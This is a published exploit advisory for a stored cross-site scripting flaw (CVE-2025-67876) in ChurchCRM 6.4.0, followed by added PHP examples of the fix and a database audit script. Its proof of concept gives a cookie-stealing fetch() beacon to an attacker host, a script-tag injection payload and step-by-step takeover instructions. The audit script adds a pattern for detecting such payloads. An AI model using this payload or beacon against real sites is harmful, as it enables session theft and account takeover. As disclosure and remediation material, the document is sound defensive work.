# 📄 ChurchCRM 6.4.0 Cross Site Scripting (PACKETSTORM:218768)

Published 2026-04-13 on Packet Storm (https://packetstorm.news/files/id/218768/, download: https://packetstorm.news/download/218768), bulletin family: exploit. Mirrored at https://zero.redgem.net/?p=46297.

ChurchCRM versions 6.4.0 and below suffer from a persistent cross site scripting vulnerability in group role name assignment.

CVE: CVE-2025-67876. CVSS 4.0 base score 9.3 (CRITICAL), vector `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/SC:H/VI:H/SI:H/VA:L/SA:L`.

---

# CVE-2025-67876: ChurchCRM has Stored XSS in Group Role Name Leading to Admin Session Hijacking

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-67876](https://nvd.nist.gov/vuln/detail/CVE-2025-67876) |
| **Severity** | CRITICAL |
| **Advisory** | [View Advisory](https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **ChurchCRM/CRM** (versions 6.4.0 and below)

## Details

### Summary

A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM that allows a low-privilege user with the "Manage Groups" permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover.

### Details

The root cause is a lack of input validation and output encoding in the handling of group role names.

When editing a group in GroupEditor.php, the user can modify the role names. The application does not sanitize or validate the input (no strip_tags, htmlspecialchars, or server-side validation). The value is stored as-is in the list_lst database table.

Later, the stored value is injected directly into HTML without escaping:

- In GroupView.php, group roles appear inside table cells wrapped in `<span>`.
- In PersonView.php, the user's assigned roles are displayed under "Assigned Groups".

Because no escaping is applied, any HTML or JavaScript stored in the role name is executed in the victim's browser.

A low-privilege user (with Manage Groups) can therefore escalate privileges to full administrator by injecting JavaScript into a role and assigning that role to an admin.

### PoC

#### Phase 1 - Attacker setup

Create x.js on an attacker-controlled machine:

`fetch('http://172.20.0.1:8000/log?cookie=' + encodeURIComponent(document.cookie));`

Serve the file:

`python3 -m http.server 800`

Note that the payload loads x.js from port 800 while the beacon inside x.js sends the cookie to port 8000. Either run a second request-logging listener on 8000 (a plain `http.server` there also works: it answers 404 but still logs the full query string) or point both at the same port. If the session cookie is flagged HttpOnly, `document.cookie` will not contain it; the script still runs inside the administrator's authenticated session and can issue requests on their behalf, so the impact does not depend on reading the cookie.

#### Phase 2 - Inject the XSS payload

1. Log in as a user with the Manage Groups permission.
   ![image](https://github.com/user-attachments/assets/f5e31c57-033a-46e0-b9fb-efa8e2d95440)
2. Navigate to Groups → List Groups → select any group → Settings.
3. In the "Group Roles" section, edit an existing role or create a new one.
4. Insert the malicious payload as the role name:

   `"><script src=//172.20.0.1:800/x.js></script>`

   ![image](https://github.com/user-attachments/assets/6b98c5cc-2059-416c-8083-279922637ebf)

   In the Group Roles list, click Default next to the role containing the injected payload. This makes the malicious role the one automatically assigned to any user added to the group, increasing the likelihood that an administrator triggers the XSS when viewing their profile.
   ![image](https://github.com/user-attachments/assets/97f973e3-839c-4930-b98e-d7a22653e8f0)

   Click Delete next to the previous default role, typically "Member". Removing the clean default role forces the system to use the injected role for all future assignments, so the payload executes whenever the victim views any page that displays their assigned role.
   ![image](https://github.com/user-attachments/assets/05732ac0-1ff0-4d0b-8e6a-e709037a4005)
5. Save the role name.
   ![image](https://github.com/user-attachments/assets/576e31ab-6d1d-4b3e-a6e0-2724d37d06b0)

#### Phase 3 - Assign the malicious role to a victim

1. Go to the Group View page.
2. Add any user as a group member (e.g., Church Admin).
   ![image](https://github.com/user-attachments/assets/9d7773cf-fee0-4f22-943b-460aa189b993)
3. Select the malicious role from the dropdown.
4. Save the assignment.
   ![image](https://github.com/user-attachments/assets/7f058565-7289-4362-8bf0-f4ad7cd83ad1)

#### Phase 4 - Execution of XSS

The stored JavaScript executes as soon as the victim (admin) visits either of:

- their user profile, PersonView.php
  ![image](https://github.com/user-attachments/assets/c41d159e-04fb-469d-bbdd-acacc58c9174)
- the group view page, GroupView.php

The beacon requests then appear on the attacker's listener:
![image](https://github.com/user-attachments/assets/c07cdc46-cb06-4a74-9481-b31391c43efe)

![image](https://github.com/user-attachments/assets/c3bd73ce-2416-4841-9687-4a1d498ab73b)

This confirms successful account takeover.

### Impact

- Stored XSS
- Full administrator session hijacking
- Privilege escalation from a low-permission user to full system admin
- Exposure of all sensitive personal data stored in ChurchCRM

### CWE

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

### Recommendation

- Apply contextual output encoding (htmlspecialchars with ENT_QUOTES) everywhere role names are rendered, including GroupView.php and PersonView.php.
- Validate role names server-side on save (length limit and a character allowlist); treat this as defence in depth, not as a substitute for output encoding.
- Review other list-based editable fields for the same pattern.
- Prefer a central escaping helper or an auto-escaping templating engine so that individual views cannot forget to encode.

## References

- https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.
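The following is an added example and not ChurchCRM's own code: a minimal PHP model of the role-name flow described in the Details section, with the vulnerable rendering next to the two fixes from the Recommendation section (contextual output encoding and save-time validation). The function names and the 50-character limit are illustrative assumptions; the payload string is the one from the PoC.

```php
<?php
// Added example, not ChurchCRM's code. renderRoleVulnerable() reproduces the
// behaviour the advisory reports (the stored value is dropped into a <span>
// untouched); renderRoleSafe() and validateRoleName() apply the fixes from the
// Recommendation section. Function names and limits are illustrative.
declare(strict_types=1);

// Vulnerable pattern: the stored role name is concatenated straight into markup.
function renderRoleVulnerable(string $roleName): string
{
    return '<span>' . $roleName . '</span>';
}

// Contextual output encoding. ENT_QUOTES also encodes single quotes, so the
// same helper is safe inside attribute values; ENT_SUBSTITUTE stops
// htmlspecialchars() from returning an empty string on invalid UTF-8, which
// would otherwise silently blank out the role in the UI.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderRoleSafe(string $roleName): string
{
    return '<span>' . escapeHtml($roleName) . '</span>';
}

// Save-time validation for a GroupEditor-style handler. This is defence in
// depth: output encoding is the actual fix, validation just keeps markup out
// of list_lst in the first place. Returns the cleaned name, or null to reject.
function validateRoleName(string $roleName): ?string
{
    $roleName = trim($roleName);
    if ($roleName === '' || mb_strlen($roleName, 'UTF-8') > 50) {
        return null;
    }
    // Letters in any script, digits, space and a few punctuation characters;
    // no angle brackets, double quotes or ampersands.
    if (!preg_match('/^[\p{L}\p{N} ._\'()\/-]+$/u', $roleName)) {
        return null;
    }
    return $roleName;
}

// The payload from the PoC above.
$payload = '"><script src=//172.20.0.1:800/x.js></script>';

echo 'vulnerable: ', renderRoleVulnerable($payload), PHP_EOL;
echo 'escaped:    ', renderRoleSafe($payload), PHP_EOL;
var_dump(validateRoleName($payload));       // the PoC payload
var_dump(validateRoleName('Youth Leader')); // a legitimate role name
```

Run it with `php example.php`. The vulnerable line shows the `<script>` tag reaching the browser verbatim; the escaped line shows it neutralised into text. Keep the encoding in the view layer even after validation is in place: validation only protects rows written after the fix, while encoding also protects rows that were planted before it.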
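The following is an added audit script, not part of ChurchCRM, for the incident-response step the Recommendation section implies but does not spell out: after upgrading, payloads already stored before the fix are still in the database and still execute until they are removed. It scans every option name in list_lst (the table the advisory names as the store for group role names) for HTML-significant characters and script handlers. The column names lst_ID, lst_OptionID and lst_OptionName, the DSN and the environment variables are assumptions; adjust them to your installation.

```php
<?php
// Added example, not part of ChurchCRM: post-patch audit of list_lst for
// stored XSS payloads. Column names, DSN and credentials are assumptions.
// Run with read-only database credentials; the script only reports.
declare(strict_types=1);

// A legitimate role or list name never needs angle brackets, double quotes,
// a javascript: URL or an on*= event handler, so any of these is worth a look.
// Ampersands and single quotes are allowed ("Youth & Family", "Pastor's Aide").
function isSuspiciousOptionName(string $value): bool
{
    return (bool) preg_match('/[<>"]|javascript:|\bon\w+\s*=/i', $value);
}

/** @return list<array{lst_ID:int,lst_OptionID:int,lst_OptionName:string}> */
function findSuspiciousOptionNames(PDO $db): array
{
    // Scan all lists, not only group-role lists: the advisory recommends
    // reviewing other list-based editable fields for the same pattern.
    $stmt = $db->query('SELECT lst_ID, lst_OptionID, lst_OptionName FROM list_lst');
    $hits = [];
    foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
        if (isSuspiciousOptionName((string) $row['lst_OptionName'])) {
            $hits[] = $row;
        }
    }
    return $hits;
}

$dsn = 'mysql:host=' . (getenv('DB_HOST') ?: '127.0.0.1')
     . ';dbname=' . (getenv('DB_NAME') ?: 'churchcrm')
     . ';charset=utf8mb4';
$db = new PDO($dsn, getenv('DB_USER') ?: 'churchcrm_ro', getenv('DB_PASS') ?: '', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

$hits = findSuspiciousOptionNames($db);
if ($hits === []) {
    echo 'No suspicious list option names found.', PHP_EOL;
    exit(0);
}
foreach ($hits as $hit) {
    // Encode before printing so the line is safe to paste into a ticket or
    // a web-based report: these values are hostile by definition.
    printf("lst_ID=%d lst_OptionID=%d name=%s\n",
        $hit['lst_ID'], $hit['lst_OptionID'],
        htmlspecialchars($hit['lst_OptionName'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}
exit(1); // non-zero exit so a cron job or CI step notices
```

Usage: `DB_HOST=db DB_USER=churchcrm_ro DB_PASS=... php audit_list_lst.php`. Any hit is an incident indicator, not just a cleanup item: the payload may already have run in an administrator's browser, so in addition to deleting or renaming the role in GroupEditor.php after upgrading, invalidate active sessions and rotate the affected administrators' credentials.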